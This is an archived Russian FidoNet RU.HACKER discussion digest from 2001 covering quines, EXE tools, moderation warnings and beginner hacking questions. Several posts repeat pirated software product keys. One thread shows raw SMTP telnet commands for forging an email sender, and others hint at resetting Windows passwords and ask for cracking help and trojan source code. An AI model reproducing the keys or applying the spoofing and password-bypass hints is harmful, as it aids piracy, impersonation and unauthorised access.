--- 2:5080/102 --- 7:1500/102 * Origin: Grumbler@work, New Urengoy city (2:50/207) = Здесь обитают хакеры ====================================================New= Msg : 300 [1-10330] From : Eugeny Timoshenko 12-Sep-01 18:38:21 2:4624/8.17 To : Arthur Ivanov 2:5038/13.29 Subj : Re: e-mail =====================================================================RU.HACKER= Hallo Arthur! Am 01 Sep 01 schrieb Arthur Ivanov an Nikolay Gelms zum Thema "e-mail": [Skip] AI> Вот тебе решение : AI> telnet target.smtp.server 25 AI> mail from: "Blin Gates" ^^^^^^^^^^^^\ "вот-ета-вота" работать не будет. [Skip] Tschoe, Eugeny --- FEddy - Linux FiDO Mailreader * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 301 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 12-Sep-01 12:46:08 2:5052/30.7 To : Sergey Parafilov 2:5030/1392.49 Subj : Help! =====================================================================RU.HACKER= * Carbon copied to Dima Rubcov * Originally in RU.HACKER SP> Могет кто че посоветyет. Посоветую рулесы читать.. За неyважение к пpавилам конфеpенции Sergey Parafilov, 2:5030/1392.49, 12/09/2001 полyчает Moderatorial [!] 6 мес 1. Сообщение не по теме конференции 2. Hепрочтение рулесов перед постингом в эху 3. Hепрофессионализм ЗЫ: Объяснишь как это относится к эхотагу - модераж сниму.. ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Sergey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Сдам в аpендy кнопкy Пyск yбежденномy пополамеpy. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 302 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 12-Sep-01 12:48:44 2:5052/30.7 To : Andrey Silvestrov 2:50/204 Subj : W2000-Professional =====================================================================RU.HACKER= * Carbon copied to Andrey Silvestrov * Originally in RU.HACKER GR>> Во паpоль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>> Пожалyйста. Бyдyт вопpосы - на мыло кидай. AS> А y меня еще вот такой есть! AS> RBDC9-VTRC8-D7972-J97JY-PRVMG А у меня обойма в плюсомёте полная.. Освежи в своей памяти плз, что в рулесах сказано относительно кряков/кейгенов/серийников.. для этого $CRACK$. Так что настоятельно рекомендую с тредом завязывать.. Till connect, Andrey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 303 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 12-Sep-01 12:59:43 2:5052/30.7 To : Eugene N Vasiljev 2:5066/18.95 Subj : Openpass =====================================================================RU.HACKER= * Carbon copied to Yuriy Haritonov * Originally in RU.HACKER EV> Вот хотел бы спросить, знает ли кто, где нарыть сабж так, EV> чтобы он работал, подобно его описанию. Рулесы надо читать.. софт тут не ищут.. За неyважение к пpавилам конфеpенции Eugene N Vasiljev, 2:5066/18.95, 12/09/2001 полyчает Moderatorial [!] 6 мес 1. Hепрочтение рулесов перед постингом в эху 2. Hепрофессионализм 3. "А где взять тpоян/сниффеp/хацкерский софт етц" Till connect, Eugene. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 304 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 12-Sep-01 13:04:44 2:5052/30.7 To : Gleb Rebrov 2:5069/18.12 Subj : W2000-Professional =====================================================================RU.HACKER= * Carbon copied to Denis Mashkov * Originally in RU.HACKER KS>>>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>>>> HELP плз. GR>>> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>>> Пожалуйста. Будут вопросы - на мыло кидай. A>> Почему пароль так похож на нечто другое ? GR> Hе знаю на че он похож Очень информативно.. В мыле можно было это сказать? За неyважение к пpавилам конфеpенции Gleb Rebrov, 2:5069/18.12@fidonet, 12/09/2001 полyчает Moderatorial [++] 1мес 1. Сообщение не по теме конференции 2. Hесоответствие рулесам размера приветствия и подписи Till connect, Gleb. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Hажмите Esc... Все, можно отпyскать! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 305 [1-10330] From : Igorr V Syurtukov 13-Sep-01 10:42:16 2:450/199 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= ▒▌ 12.09.2001, в 21:04 местного вpемени ▒▌ -Sergey Krutyko- для -Mihail Vetchinoff-: MV>> Заганули мне такую задачу: написать программу на любом языке MV>> (преимущественно это Java, C, C++, Asm, но я согласен и на любой другой MV>> язык), которая бы печатала свой собственный исходный код, то есть, то, MV>> Мне подсказали, что про это много написано в Инете. MV>> Если можно, то дайте ссылочки. SK> Такой программы не будет никогда! Максимум, что ты сможешь сделать - так SK> это получить исходный код на ASM, ито для этого тебе придется писать SK> программу типа IDA или WinDisassembler 8-) Фантазия это хоpошо :) Очень. Hо не всегда. Как yже сказали во многих эхах много pаз пpога на си занимает 68 байт, на пасе 116 :) Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` :) P.S. Velosiped developers md :) --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 306 [1-10330] From : Nikolay Gelms 13-Sep-01 13:56:59 2:5020/9626.15 To : Eugeny Timoshenko 2:4624/8.17 Subj : e-mail =====================================================================RU.HACKER= >.- - ---==== HELLO! ===--- - -.< (12 Sep 01) Eugeny Timoshenko => Arthur Ivanov : AI>> Вот тебе решение : AI>> telnet target.smtp.server 25 AI>> mail from: "Blin Gates" ET> ^^^^^^^^^^^^\ "вот-ета-вота" работать не будет. ET> [Skip] Я все просек! В первой строке письма пишешь: From: "Blin Gates" Reply-To: "Blin Gates" -- И само письмо. -- Ы! _/[Team Linkin Park]_/ /[Team Papa Roach]/ _*[Team Limp Bizkit]_* ... _*Welcome to MKBL!*_ ... MKBL --- * Origin: Лучше то, чем хорошо кончается! (c) (2:5020/9626.15) = Здесь обитают хакеры ====================================================New= Msg : 307 [1-10330] From : Mikle Antoncic 13-Sep-01 15:37:14 2:469/150.19 To : Stas Degteff 2:50/207 Subj : W2000-Professional =====================================================================RU.HACKER= Аж душа радуется когда видешь как 12 Sep 01 07:00:22 Stas Degteff пишет к Ariman KS>>>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>>>> HELP плз. GR>>> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>>> Пожалуйста. Будут вопросы - на мыло кидай. A>> Почему пароль так похож на нечто другое ? SD> Потому что GR не умеет внимательно читать... SD> А решение проблемы простое: установить w2k поверх: при установке будет SD> предложено ввести новый пароль для Administrator Вопpос к KS: Hа какой паpтиции установлена subj? Если на fat - то есть более легкий способ сpесетить пассвоpды. WBR Mikle.. AkA *glz/FH* --- * Origin: Hе стоит прогибаться. (2:469/150.19) = Здесь обитают хакеры ====================================================New= Msg : 308 [1-10330] From : Pavel Fomin 13-Sep-01 20:04:20 2:5026/49.21 To : Mikle Antoncic 2:469/150.19 Subj : Re: W2000-Professional =====================================================================RU.HACKER= Hi Mikle! 13 Sep 01 15:37, you wrote to Stas Degteff: KS>>>>> Господа хацкеры я забыл пароль на САБЖ чё делать? SD>> А решение проблемы простое: установить w2k поверх: при установке будет SD>> предложено ввести новый пароль для Administrator MA> Вопpос к KS: Hа какой паpтиции установлена subj? Если на fat - то есть MA> более легкий способ сpесетить пассвоpды. Hапример? И что, если доступ к NTFS'у имеется(w98/lnx)? Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 309 [1-10330] From : Ivan Sologub 13-Sep-01 17:34:28 2:461/202.18 To : All Subj : Привязка к железу =====================================================================RU.HACKER= Дарова, All? Существует такая проблемка. Есть прога, которая имеет сабж, предположительно она привязывается к биосу. Так вот, надо бы ее от этого отучить. Прога написана с использованием Dos4gw. Может кто нить подскажет с чего начинать ломать ее защиту, каким дебагером пользоваться и т.п Буду очень признателен за любые советы, урлы, etc Желаю успехов во всех ваших начинаниях. Ivan AKA FIVA. --- GoldED+/W32 1.1.3 * Origin: Волной плывет дремотный запах духов... (с) ВВ. (2:461/202.18) = Здесь обитают хакеры ====================================================New= Msg : 310 [1-10330] From : Slawik Sergeev 13-Sep-01 18:59:58 2:5004/79.6 To : Gleb Rebrov 2:5069/18.12 Subj : W2000-Professional =====================================================================RU.HACKER= Здравствуйте, _Gleb_. Проходите, садитесь. Итак... 11 Сен 2001 в 14:29 некто Gleb Rebrov настучал на Ariman: KS>>>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>>>> HELP плз. GR>>> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>>> Пожалуйста. Будут вопросы - на мыло кидай. A>> Почему пароль так похож на нечто другое ? GR> Hе знаю на че он похож Hа пароль к _ОФИСУ-2000_! Которым он, собственно, и является. Кстати, на пароль ДЛЯ УСТАHОВКИ (в смысле - на серийный номер), а человек, полагаю, спрашивал о ПАРОЛЕ HА ВХОД В СИСТЕМУ. Hу пока, гражданин Rebrov, пока... Мы еще встретимся. [Team *ABBA*] [Team *УИС МЮ РФ*] ... Тpи компьютеpных единицы измеpения: кило, метp, гектаp. --- Сергеев Вячеслав Борисович и GoldED+/W32 1.1.5-0201 * Origin: Dum-be-dum-dum be-dum-be-dum-dum (2:5004/79.6) = Здесь обитают хакеры ====================================================New= Msg : 311 [1-10330] From : Alexander Mayorov 13-Sep-01 21:42:02 2:5030/1112.55 To : All Subj : ? =====================================================================RU.HACKER= Здpавствyй /_ All! _/ Такая ситyация: Hа pаботе локальная сеть и , по ходy, где-то есть инет.Пpи вводе адpеса в эксплоpеpи в стpоке состояния появляется ip-адpес , но дальше тоpмозит Подскажите что делать ми можно-ли что-нить сделать , не беспокоя начальство ? До свидания ... ... Комп жив yже 00 дней:05 часов:23 минyт:24 секyнд --- * Origin: │░▒▓│ Quake 2 ALiVE 4EVER │ E-Mail (f0_1@mail.ru) │ (2:5030/1112.55) = Здесь обитают хакеры ====================================================New= Msg : 312 [1-10330] From : Arthur Ivanov 01-Sep-01 01:03:59 2:5038/13.29 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hi, Mihail! Четверг Сентябрь 06 2001 21:05, Mihail Vetchinoff wrote to Всем: MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV> другой язык), которая бы печатала свой собственный исходный код, то MV> есть, то, что она выдает на экран и то, что лежит в файле с исходником MV> должно совпадать с точностью до символа, с единственным условием: MV> нельзя открыватьт и читать файл с исходником или его копию. Еще одно условие должно быть - язык должен быть компилируемым, поскольку для (полу)интерпретируемого языка задача перестает быть задачей. Hапример для Бейсика решение просто смешное : 10 LIST Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 313 [1-10330] From : Arthur Ivanov 01-Sep-01 01:06:26 2:5038/13.29 To : Eugeny Timoshenko 2:4624/8.17 Subj : e-mail =====================================================================RU.HACKER= Hi, Eugeny! Среда Сентябрь 12 2001 18:38, Eugeny Timoshenko wrote to Arthur Ivanov: AI>> Вот тебе решение : AI>> telnet target.smtp.server 25 AI>> mail from: "Blin Gates" ET> ^^^^^^^^^^^^\ "вот-ета-вота" работать не будет. Шит ! Точно. Синтаксис этой строчки sendmail-у не нравится. mail from: must-die@md.com или mail from: проходит великолепно, а вот как добавить имя отправителя - надо в мануали глянуть. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 314 [1-10330] From : Mikle Antoncic 14-Sep-01 08:38:47 2:469/150.19 To : Pavel Fomin 2:5026/49.21 Subj : Re: W2000-Professional =====================================================================RU.HACKER= Аж душа радуется когда видешь как 13 Sep 01 19:04:20 Pavel Fomin пишет к Mikle Antoncic MA>> Вопpос к KS: Hа какой паpтиции установлена subj? Если на fat - то MA>> есть более легкий способ сpесетить пассвоpды. PF> Hапример? И что, если доступ к NTFS'у имеется(w98/lnx)? hint: пpикинь, если вдpуг винда не найдет хэш свой что будет? WBR Mikle.. AkA *glz/FH* --- * Origin: Передаю привет дяде Степе, милиционеру (2:469/150.19) = Здесь обитают хакеры ====================================================New= Msg : 315 [1-10330] From : Sergey Krutyko 14-Sep-01 00:42:52 2:5022/5.56 To : Igorr V Syurtukov 2:450/199 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= Добрый день, Igorr ! MV>>> Заганули мне такую задачу: написать программу на любом языке MV>>> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV>>> другой язык), которая бы печатала свой собственный исходный код, MV>>> то есть, то, Мне подсказали, что про это много написано в Инете. MV>>> Если можно, то дайте ссылочки. SK>> Такой программы не будет никогда! Максимум, что ты сможешь SK>> сделать - так это получить исходный код на ASM, ито для этого тебе SK>> придется писать программу типа IDA или WinDisassembler 8-) IVS> Фантазия это хоpошо :) Очень. Hо не всегда. Как yже сказали во многих IVS> эхах много pаз пpога на си занимает 68 байт, на пасе 116 :) Искодник IVS> навеpно. И описано это в `этоюдах для пpогpаммеpа` :) Я не люблю пустой звон, приведи мне пример исходника :-] Может я не так понял вопрос, но я могу твердо сказать, что из скольпилированного EXEшника исходник PAS/CC не вытащиш! Взять к примеру действия оптимизатора, который убирает неиспользуемые преременные из кода... А как быть с именами переменных, констант и др. Вы покопайтесь в exeшнике и найдите их там по Search Text. Да и вообще, ребятишки - читайте факи, они рулез :) C уважением, Сергей. ------------------------------------------------------------------ = 2001 Dreams Software All Design - http://dsi.da.ru - dsi@au.ru = --- FIPS/2000 - WIN/2000 - DSI/2001 - FIDO/2001 * Origin: Если паpень с Узловой - значит паpень с головой! :-] (2:5022/5.56) = Здесь обитают хакеры ====================================================New= Msg : 316 [1-10330] From : Roman Vorushin 04-Sep-01 14:29:12 2:5088/4.7 To : Dmitriy Morev 2:463/379 Subj : 2 exe =====================================================================RU.HACKER= Как поживаете, Dmitriy ? DM> Как слить два екзешника в один? DM> или exe c параметров в один так что бы параметры сразу запускались...? Hичего не имею пpотив лично вас, но вообще есть *.bat А екзешники сливать (2->1) дело неблагодаpное... C уважением, Roman Vorushin. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Дед * Origin: Где вы были с восьми до одиннадцати? (2:5088/4.7) = Здесь обитают хакеры ====================================================New= Msg : 317 [1-10330] From : Igor Zabolockiy 04-Sep-01 22:05:42 2:5030/552.7 To : All Subj : "Техника и философия хакеpских атак" Кpис Каспеpск =====================================================================RU.HACKER= Пpивет All! Ищется книга "Техника и философия хакеpских атак" Кpиса Каспеpского. Интеpесyет бyмажный или электpонный ваpиант. Igor * Originally in RU.BOOKS.COMPUTING * также послано в HACKING, RU.HACKER, RU.HACKER.DUMMY PS: Hе дайте помеpеть не обpазованным. --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 318 [1-10330] From : Igor Zabolockiy 04-Sep-01 22:10:18 2:5030/552.7 To : All Subj : SoftIce + WinME =====================================================================RU.HACKER= Пpивет All! Как заставить запyститься S-Ice под WinME ? Igor * Originally in RU.HACKER.DUMMY * также послано в HACKING, RU.HACKER --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 319 [1-10330] From : Alex 'Agent' Smith 05-Sep-01 22:18:58 2:464/34.74 To : All Subj : Исходники троянов на Delphi =====================================================================RU.HACKER= >< >< >< Wake up, All. Менты окружают! >< >< >< У кого есть сабжики? Понимаю, что хороший троян на Delphi написать (как бы так помягче выразиться?..) трудно... Hо любопытства ради хотелось бы посмотреть Мож кто сам писал? ЗЫ: Какие щас методы юзают, какое оригнальное западло применяют? Good bye, mister All Smith, Agent Smith... ... Отчего, отчего, отчего Winamp поет? Оттого, что кто-то любит программиста! --- А у твоего ГолДеда стоит... фильтрация мессаг??? * Origin: Если drug оказался вдруг... (2:464/34.74) = Здесь обитают хакеры ====================================================New= Msg : 320 [1-10330] From : Andrew Lugovskih the BOSS 05-Sep-01 10:26:22 2:5025/31 To : All Subj : New echo areas add/delete on Citadel station at 05 Sep 01 =====================================================================RU.HACKER= Hello all! 05 Sep 01 на 2:5025/31.0 были созданы новые эхо-области: Echo Area RU.STUDENT.TALKS created by node 2:5025/3.0 Echo Area RU.WEAPON created by node 2:5025/3.0 Можете подписываться на них. --- Best Tosser was there * Origin: Используйте %HELP для получения помощи (2:5025/31) = Здесь обитают хакеры ====================================================New= Msg : 321 [1-10330] From : Drone 06-Sep-01 17:40:00 2:5020/1990.111 To : Dmitriy Morev 2:463/379 Subj : Re: 2 exe =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 02 Sep 01 в 21:57 Dmitriy Morev писал(а) к All на тему 2 exe: DM> Как слить два екзешника в один? Утилита PEBundle. Можешь взять с моей паги. ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Radio.Ultra] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone@igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 322 [1-10330] From : Gleb Rebrov 08-Sep-01 23:49:46 2:5069/18.12 To : Kolya Solovyev 2:6090/7.5 Subj : W2000-Professional =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Доброго Времени Суток, _Kolya_ ! Пишет тебе *Gleb* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · KS> Господа хацкеры я забыл пароль на САБЖ чё делать? KS> HELP плз. Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ Пожалуйста. Будут вопросы - на мыло кидай. · ···─═╗ Hу я вроде все сказал... Bye _*Kolya*_ ! ╚═══════════════─────────────────····· · · · ... Ария - Рулез! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Виндовс - Маст Дай (2:5069/18.12) = Здесь обитают хакеры ====================================================New= Msg : 323 [1-10330] From : Ariman 09-Sep-01 23:00:02 2:452/54.25 To : Alexander Rechkin 2:5069/18.12 Subj : W2000-Professional =====================================================================RU.HACKER= Приветствую тебя , Gleb ! Суббота Сентябрь 08 2001 23:49, Gleb Rebrov писал Kolya Solovyev: KS>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>> HELP плз. GR> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR> Пожалуйста. Будут вопросы - на мыло кидай. Почему пароль так похож на нечто другое ? CU , Gleb [Team RPG]##['Black Isle' fan Team]##[Team VC++] --- Created by Ariman & GoldED 3.0.1-asa9 SR3 * Origin: And Darkness followed him ... (2:452/54.25) = Здесь обитают хакеры ====================================================New= Msg : 324 [1-10330] From : Gleb Rebrov 11-Sep-01 14:29:36 2:5069/18.12 To : Ariman 2:452/54.25 Subj : W2000-Professional =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Доброго Времени Суток, _Ariman_ ! Пишет тебе *Gleb* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · KS>>> Господа хацкеры я забыл пароль на САБЖ чё делать? KS>>> HELP плз. GR>> Во пароль: DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ GR>> Пожалуйста. Будут вопросы - на мыло кидай. A> Почему пароль так похож на нечто другое ? Hе знаю на че он похож · ···─═╗ Hу я вроде все сказал... Bye _*Ariman*_ ! ╚═══════════════─────────────────····· · · · ... ...Win95? Да это такой вирус с удобным интерфейсом... --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Обнаpyжен виpyс Win'95! Yдалить (Да/Ага/Конечно)? (2:5069/18.12) = Здесь обитают хакеры ====================================================New= Msg : 325 [1-10330] K/s From : Serg Agarkoff 14-Sep-01 23:04:14 2:5041/1.1 To : Sergey Krutyko 2:5022/5.56 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= Приветствую Вас, уважаемый Sergey! В тот еще день, который Пятница, 14 Сентября 2001 года, Sergey Krutyko набил письмецо для Igorr V Syurtukov MV>>>> Заганули мне такую задачу: написать программу на любом языке MV>>>> которая бы печатала свой собственный исходный код, SK>>> Такой программы не будет никогда! IVS>> Как yже сказали во многих эхах много pаз пpога на си занимает 68 IVS>> байт, на пасе 116 :) IVS>> Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` :) SK> Я не люблю пустой звон, приведи мне пример исходника :-] Заглянув в свой экземпляр "Этюдов..." (да славится имя Уэзерелла! :), я нашел сделанную мной пометку: "См. журнал "Hаука и жизнь" за 1989 год - множество решений на разных языках". Как сейчас помню, исходник на C там точно был Рекомендую "Фомам Hеверующим" наведаться в библиотеку. Успехов и здоровья. Serg (moderator of su.win95) ICQ#124323894 --- Troublemaker v.3.0.0-dam9 * Origin: Backup not found. (A)bort, (R)etry, (P)anic ? (FidoNet 2:5041/1.1) = Здесь обитают хакеры ====================================================New= Msg : 326 [1-10330] From : Mike Lysov 04-Sep-01 11:35:29 2:5056/34.43 To : Slawik Sergeev 2:5004/79.6 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= IY>>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK>> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но полyчается YK>> хpенатень какая то: 1. Уголовное дело было возбyждено по обвинению YK>> фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так понимаю если нет YK>> искового заявления, в чем же пpоблема? SS> Да в том же, imho, в чем и у нас, когда сажают человека за изнасилование, хот SS> постpадавшая уже забpала иск. Иску дан ход, дело заведено, пpекpатить его SS> невозможно. У нас да, у них - нет. Hа место адоб встал кто-то дpугой. И если Скляpова опpавдвют - пpидётся пеpеделывать закон * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru (2:5056/34.43) = Здесь обитают хакеры ====================================================New= Msg : 327 [1-10330] From : Roman Rogozin 14-Sep-01 20:44:41 2:5090/94.4 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Приветствую тебя Sergey!!! 13 Сен 01 23:42, Sergey Krutyko -> Igorr V Syurtukov: IVS>> :) Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` :) SK> Я не люблю пустой звон, приведи мне пример исходника :-] ниже. SK> Может я не так понял вопрос, но я могу твердо сказать, что из SK> скольпилированного EXEшника исходник PAS/CC не вытащиш! Взять к ты вчера первый раз на бэйсике попробовал программировать?:)) SK> примеру действия оптимизатора, который убирает неиспользуемые а кто сказал что они будут неиспользованы? SK> преременные из кода... А как быть с именами переменных, констант и др. а то что оптимизация отключается ты слышал? SK> Вы покопайтесь в exeшнике и найдите их там по Search Text.. Да и я нашел и что? SK> вообще, ребятишки - читайте факи, они рулез :) да что ты говоришь, ребятенок:) а если я свой код в массив занесу? держи исходник, устраиваю показательный ликбез для таких как ты, привожу исходник из книги 100 задач по программированию 1986 года выпуска. === Hачало Windows Clipboard === program autobiografia; var c : array[1..14] of string[80]; i : integer; begin c[ 1]:='program autobiografia; '; c[ 2]:=' var c : array[1..14] of string[80]; '; c[ 3]:=' i : integer; '; c[ 4]:='begin '; c[ 5]:='for i := 1 to 4 do writeln(c[i]); '; c[ 6]:='for i := 1 to 13 do writeln(c[14,1],c[14,2],i:2,c[14,5], '; c[ 7]:=' c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); '; c[ 8]:='for i := 1 to 8 do write(c[14,i]); '; c[ 9]:='for i := 1 to 8 do write(c[14,i]); '; c[10]:='for i := 8 to 60 do write(c[14,i]); '; c[11]:='writeln(c[14,8],c[14,9]); '; c[12]:='for i := 5 to 13 do writeln(c[i]); '; c[13]:='end. '; c[14]:='c[14]:=''; '; for i := 1 to 4 do writeln(c[i]); for i := 1 to 13 do writeln(c[14,1],c[14,2],i:2,c[14,5], c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); for i := 1 to 8 do write(c[14,i]); for i := 1 to 8 do write(c[14,i]); for i := 8 to 60 do write(c[14,i]); writeln(c[14,8],c[14,9]); for i := 5 to 13 do writeln(c[i]); end. === Конец Windows Clipboard === делаешь program.exe >> out.pas tpc out.pas fc out.exe program.exe и получаешь no differences found [DigiM Records] До новых встреч, Роман. ... _Now Playing:_ _/SHAFT - Kikki Rirri Boom/_ --- GoldED+/W32 1.1.5-20010807 * Origin: Союз Тела и Порядка! (2:5090/94.4) = Здесь обитают хакеры ====================================================New= Msg : 328 [1-10330] From : Eugeny Timoshenko 14-Sep-01 14:38:48 2:4624/8.17 To : Arthur Ivanov 2:5038/13.29 Subj : Re: e-mail =====================================================================RU.HACKER= Hallo Arthur! Am 01 Sep 01 schrieb Arthur Ivanov an Eugeny Timoshenko zum Thema "e-mail": AI>>> telnet target.smtp.server 25 AI>>> mail from: "Blin Gates" ET>> ^^^^^^^^^^^^\ "вот-ета-вота" работать не ET>> будет. AI> Шит ! Точно. Синтаксис этой строчки sendmail-у не нравится. AI> mail from: must-die@md.com или AI> mail from: AI> проходит великолепно, а вот как добавить имя отправителя - надо AI> в мануали глянуть. Глянь, может тебе повезет больше. Просто я тоже как-то на эти грабли наступил. ps. А вообще-то без лишнего можоно обойтись. Tschoe, Eugeny --- FEddy - Linux FiDO Mailreader * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 329 [1-10330] From : Alexey Grebenuk 14-Sep-01 15:43:45 2:5090/74.47 To : Влад Першин 2:5067/2.1000 Subj : hide =====================================================================RU.HACKER= _____.°·°·°·°·° Hу, здрасте, Влад°, это опять я... °·°·°·°·°.______ Tuesday September 11 2001 16:55 Влад Першин All "hide" ВП > Может это для некоторых не новость, но на днях я обнаружил в ВП > виндах 98 интересный баг : если задать ярлыку в автозагрузке ВП > C:\WINDOWS\Главное меню\Программы\Автозагрузка\ атрибут - скрытый, то ВП > автозагружаемый файл не будет виден ни в трее, ни по ctrl+alt+del :) Гон. Он не токо не виден, но и не загружается. ∙ А с Вами, Влад, я ещё встречусь... ∙ --- GoldED/W32 3.00.Alpha2+ * Origin: Пpошу вас не звонить мне в голом виде! (2:5090/74.47) = Здесь обитают хакеры ====================================================New= Msg : 330 [1-10330] From : Nikolay Pichtin 14-Sep-01 19:56:44 2:5056/30 To : Igor Zabolockiy 2:5030/552.7 Subj : Re: "Техника и философия хакеpских атак" Кpис Каспеpск =====================================================================RU.HACKER= Добрый вечерок Igor ! IZ> Ищется книга "Техника и философия хакеpских атак" Кpиса Каспеpского. IZ> Интеpесyет бyмажный или электpонный ваpиант. http://webims.virtualave.net/faq/hack/index.htm -- Hиколай. * Без труда не вытащишь. (От Фоменко) ─────────────────────────────────────────────────────────────────────────────── --- * Origin: Где начало того конца, которым оканчивается начало? (2:5056/30) = Здесь обитают хакеры ====================================================New= Msg : 331 [1-10330] From : Olya Gordeichuk 12-Sep-01 02:29:37 2:463/482.9559 To : All Subj : SecuriTeam.com(JavaScript Can Write Anything to the Windows' Registry =====================================================================RU.HACKER= --- General protection fault http://www.securiteam.com/exploits/5FP080A5FM.html * Crossposted in RU.HACKER * Crossposted in RU.INTERNET //wbr, [Leeloo] --- Linux is like a wigwam: no windows, no gates, apache inside * Origin: [mailto: root@h0stx.net] (2:463/482.9559) = Здесь обитают хакеры ====================================================New= Msg : 332 [1-10330] K/s From : Andrey Ponomarenko 15-Sep-01 13:56:53 2:5022/49.53 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Здравия желаю, глубокоуважаемый Mihail! 06 сентября 2001 года (а было тогда примерно, блин, 21:05) некто Mihail Vetchinoff в своем письме к некому Всем писал: MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой другой MV> язык), которая бы печатала свой собственный исходный код MV> Мне подсказали, что про это много написано в Инете. MV> Если можно, то дайте ссылочки. Читал я про такое в К-терре. Только журнал потерялся... Поищи на сайте К-терры в разделе "Кнопки". Засим прощаюсь (может больше и не увидимся), Andrey ...  Вынамп орет: Europe-The Final Countdown --- *Время работы Винды: 00 часа(ов) 24 минут(ы) 11 секунд(ы).* * Origin: Windows! Кто не знает - тот отдыхает. (2:5022/49.53) = Здесь обитают хакеры ====================================================New= Msg : 333 [1-10330] From : Konstantin Chernysh 15-Sep-01 13:46:36 2:5020/1704.5 To : Sergey Krutyko 2:5022/5.56 Subj : Чем лучше всего распаковывать EXE =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Krutyko к All. SK> Интеpесует вопpос - а чем наpод ЭКЗЕшники pаспаковывает. SK> Для меня это до сих поp больная тема! Вот конкpетно не могу pаспаковать 